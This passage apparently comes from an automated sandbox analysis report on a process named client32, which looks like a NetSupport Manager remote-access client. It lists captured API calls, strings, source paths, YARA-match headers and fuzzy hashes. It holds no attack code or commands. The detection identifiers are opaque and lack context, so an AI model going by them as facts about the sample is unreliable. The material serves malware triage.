                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                  • m_hWnd, xrefs: 11017206
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                  • m_hWnd, xrefs: 11001136
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1604732272-2830328467
                                                                                  APIs
                                                                                  • KillTimer.USER32(?,?), ref: 1100102B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                  • m_hWnd, xrefs: 11001016
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2229609774-2830328467
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                  • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadVersion
                                                                                  • String ID: AudioCapture.dll
                                                                                  • API String ID: 3209957514-2642820777
                                                                                  APIs
                                                                                  • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                  • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FindMessageSendWindow
                                                                                  • String ID: MSOfficeWClass
                                                                                  • API String ID: 1741975844-970895155
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                  • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                  • API String ID: 1417657345-2201682149
                                                                                  APIs
                                                                                  • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                  • m_hWnd, xrefs: 1101D3A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1590435379-2830328467
                                                                                  • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                  • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                  • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                  • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MenuProp
                                                                                  • String ID: OldMenu
                                                                                  • API String ID: 601939786-3235417843
                                                                                  • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                  • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                  • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                  • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9